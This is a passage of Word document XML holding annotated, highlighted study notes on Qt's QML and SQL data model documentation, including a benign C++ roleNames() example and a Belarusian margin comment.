          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2642" w:anchor="parentModelIndex-method" w:history="1">
        <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>DelegateModel::parentModelIndex</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() returns a</w:t>
      </w:r>
      <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2643" w:history="1">
        <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QModelIndex</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which can be assigned to</w:t>
      </w:r>
      <w:r w:rsidR="004E21D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2644" w:anchor="rootIndex-prop" w:history="1">
        <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>DelegateModel::rootIndex</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="004E21D3" w:rsidRPr="004E21D3" w:rsidRDefault="009B0C93" w:rsidP="004E21D3">
      <w:pPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B0C93">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="004E21D3" w:rsidRPr="009B0C93">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Я гэта разумею слаба, бо н</w:t>
      </w:r>
      <w:r w:rsidRPr="009B0C93">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>езнаёмы з іерархічнымі мадэлямі</w:t>
      </w:r>
      <w:r w:rsidRPr="009B0C93">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="0088385D" w:rsidP="009B0C93">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2359" w:name="sql-models"/>
      <w:bookmarkStart w:id="2360" w:name="_Toc483001038"/>
      <w:bookmarkStart w:id="2361" w:name="_Toc483004029"/>
      <w:bookmarkStart w:id="2362" w:name="_Toc483604379"/>
      <w:bookmarkStart w:id="2363" w:name="_Toc483605599"/>
      <w:bookmarkEnd w:id="2359"/>
      <w:r w:rsidRPr="009B0C93">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL Models</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2360"/>
      <w:bookmarkEnd w:id="2361"/>
      <w:bookmarkEnd w:id="2362"/>
      <w:bookmarkEnd w:id="2363"/>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="0088385D" w:rsidP="0088385D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991333">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Qt provides C++ classes that support </w:t>
      </w:r>
      <w:r w:rsidRPr="00991333">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL data models</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. These classes work </w:t>
      </w:r>
      <w:r w:rsidRPr="00991333">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>transparently</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the underlying SQL data, </w:t>
      </w:r>
      <w:r w:rsidRPr="00991333">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reducing the need to run SQL queries for basic SQL operations such as create, insert, or update</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For more details about these classes, see</w:t>
      </w:r>
      <w:r w:rsidR="00991333">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2645" w:history="1">
        <w:r w:rsidRPr="00991333">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using the SQL Model Classes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00991333" w:rsidRPr="00991333">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId2646" w:history="1">
        <w:r w:rsidR="00991333" w:rsidRPr="00991333">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/sql-model.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00991333" w:rsidRPr="00991333">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00991333">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="009B0C93" w:rsidRDefault="0088385D" w:rsidP="0088385D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Although the C++ classes provide complete feature sets to operate on SQL data, they do not provide data access to QML. </w:t>
      </w:r>
      <w:r w:rsidRPr="00991333">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>So you must implement a C++ custom data model as a subclass of one of these classes, and expose it to QML either as a type or context property</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009B0C93">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B0C93">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="009B0C93" w:rsidRPr="009B0C93">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>context property is important QML concept</w:t>
      </w:r>
      <w:r w:rsidR="009B0C93">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="0088385D" w:rsidP="009B0C93">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2364" w:name="read-only-data-model"/>
      <w:bookmarkStart w:id="2365" w:name="_Toc483001039"/>
      <w:bookmarkStart w:id="2366" w:name="_Toc483604380"/>
      <w:bookmarkStart w:id="2367" w:name="_Toc483605600"/>
      <w:bookmarkEnd w:id="2364"/>
      <w:r w:rsidRPr="009B0C93">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Read-only Data Model</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2365"/>
      <w:bookmarkEnd w:id="2366"/>
      <w:bookmarkEnd w:id="2367"/>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="0088385D" w:rsidP="0088385D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The custom model must </w:t>
      </w:r>
      <w:r w:rsidRPr="00991333">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reimplement the following methods to enable read-only access to the data from QML</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2647" w:anchor="roleNames" w:history="1">
        <w:r w:rsidR="0088385D" w:rsidRPr="00991333">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>roleNames</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() to expose the role names to the QML frontend. For </w:t>
      </w:r>
      <w:r w:rsidR="0088385D" w:rsidRPr="00991333">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the following version returns the selected table's field names as role names:</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QHash</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int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QByteArray</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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SqlQueryModel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roleNames</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const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rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>QHash</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>QByteArray</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> roles</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rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>// record() returns an empty QSqlRecord</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for</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> i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0</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i </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;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this</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>record</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count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i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roles</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insert</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Qt</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UserRole</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i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1</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record</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fieldName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i</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toUtf8</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rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> roles</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88385D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2648" w:anchor="data" w:history="1">
        <w:r w:rsidR="0088385D" w:rsidRPr="00991333">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>data</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() to </w:t>
      </w:r>
      <w:r w:rsidR="0088385D" w:rsidRPr="00991333">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>expose SQL data to the QML frontend</w:t>
      </w:r>
